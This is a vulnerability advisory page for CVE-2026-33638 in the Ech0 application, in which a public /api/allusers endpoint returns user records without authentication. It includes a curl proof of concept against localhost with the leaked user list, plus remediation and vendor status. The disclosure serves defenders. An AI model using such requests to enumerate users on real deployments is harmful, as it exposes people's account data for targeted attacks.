Suse
CVE-2026-33638
MEDIUM
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
GET /api/allusers is mounted as a public endpoint and returns user records without authentication. This allows remote unauthenticated user enumeration and exposure of user profile metadata.
Details
The route is registered under public routes:
internal/router/user.go:17appRouterGroup.PublicRouterGroup.GET("/allusers", h.UserHandler.GetAllUsers())
The handler itself is documented as requiring authentication:
internal/handler/user/user.go:177-185- API docs/annotations indicate auth requirement (
@Security ApiKeyAuth).
PoC
1) Negative control: endpoint that should require auth
Request:
curl -i "http://localhost:6277/api/user"Response:
HTTP/1.1 401 Unauthorized
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PATCH, PUT
Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0
Content-Language: zh-CN
Content-Type: application/json; charset=utf-8
Expires: 0
Pragma: no-cache
Surrogate-Control: no-store
Date: Sun, 22 Mar 2026 07:21:22 GMT
Content-Length: 135
{"code":0,"msg":"未找到令牌,请点击右上角登录","error_code":"TOKEN_MISSING","message_key":"auth.token_missing","data":null}2) Trigger: call public user-list endpoint without auth
Request:
curl -i "http://localhost:6277/api/allusers"Response:
HTTP/1.1 200 OK
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PATCH, PUT
Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type
Content-Language: zh-CN
Content-Type: application/json; charset=utf-8
Date: Sun, 22 Mar 2026 07:21:56 GMT
Content-Length: 912
{"code":1,"msg":"获取用户列表成功","data":[{"id":"019d144a-18fa-7db3-a2dd-310604210abd","username":"h1_poc_1774161893_1","email":"h1_poc_1774161893_1@example.com","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-1904-7c0a-98ec-656079a82c64","username":"h1_poc_1774161893_2","email":"h1_poc_1774161893_2@example.com","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-190b-70f8-89cb-4f8ab46cec9b","username":"h1_poc_1774161893_3","email":"h1_poc_1774161893_3@example.com","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-e7dc-7cef-9395-4d0e392a5278","username":"alice","email":"alice@example.com","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"},{"id":"019d144a-e7e3-79f3-bb09-0ea758333a54","username":"bob","email":"bob@example.com","is_admin":false,"is_owner":false,"avatar":"","locale":"zh-CN"}]}Impact
Vulnerability type: Access control bypass / unauthenticated data exposure. Who is impacted: Any deployment exposing the API to untrusted networks, and all users whose profile metadata can be enumerated. Business/security impact: Enables account reconnaissance and targeted credential attacks.
A fix is available at https://github.com/lin-snow/Ech0/releases/tag/v4.2.0.
AnalysisAI
The Ech0 application exposes an unauthenticated API endpoint GET /api/allusers that returns a complete list of user records including usernames, email addresses, and account metadata without requiring authentication. This allows remote attackers to enumerate all system users and gather profile information for reconnaissance and targeted attacks. A working proof-of-concept exists demonstrating the vulnerability, and a patch is available in version 4.2.0.
Technical ContextAI
The vulnerability exists in the Go-based Ech0 application (pkg:go/github.com_lin-snow_ech0) where the /api/allusers route is incorrectly registered under public routes in internal/router/user.go:17 despite handler documentation indicating an authentication requirement via @Security ApiKeyAuth annotation. This represents a CWE-862 (Missing Authorization) issue—the endpoint lacks proper access control checks at the routing layer, allowing unauthenticated requests to execute the GetAllUsers handler and return sensitive user profile data including user IDs (UUIDs), usernames, email addresses, administrative status flags, and locale preferences. The mismatch between documented security requirements and actual route registration created an authorization bypass condition.
RemediationAI
Upgrade Ech0 to version 4.2.0 or later immediately, which contains the authoritative patch (commit acbf1fd71011e6b9e1e6a911128056a19862f681 from https://github.com/lin-snow/Ech0/commit/acbf1fd71011e6b9e1e6a911128056a19862f681). The patch moves the /api/allusers endpoint from public routes to protected routes, reinstating the authentication requirement documented in the handler. For deployments unable to upgrade immediately, implement network-level access controls by restricting access to the /api/allusers endpoint via a reverse proxy (nginx, Apache, or cloud WAF) to trusted IP ranges only, and monitor access logs for suspicious enumeration attempts. Additionally, review deployment architecture to ensure the Ech0 API is not exposed directly to untrusted networks.
Same weakness CWE-862 – Missing Authorization
View allSame technique Information Disclosure
View allVendor StatusVendor
SUSE
Severity: Medium| Product | Status |
|---|---|
| openSUSE Leap 15.6 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP5 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP6 | Fixed |
| openSUSE Leap 15.5 | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today